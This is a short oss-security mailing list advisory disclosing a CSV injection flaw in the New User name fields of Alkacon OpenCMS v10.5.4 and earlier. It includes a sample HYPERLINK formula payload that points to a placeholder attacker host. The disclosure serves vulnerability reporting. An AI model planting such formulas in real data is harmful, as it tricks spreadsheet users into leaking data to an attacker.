[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CSV Injection | Alkacon OpenCMS v10.5.4 and before
From: Pramod Rana <varchashva () gmail ! com>
Date: 2019-05-05 10:12:22
Message-ID: CALv8orHZc+_tuwny9g9JGQzX1VBES3L1OYjmdwNzeZNeRWAhJw () mail ! gmail ! com
[Download RAW message or body]
Description
- OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name
- Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
- Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'
Further details
- https://github.com/alkacon/opencms-core/issues/636
Already requested for CVE, yet to receive it.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic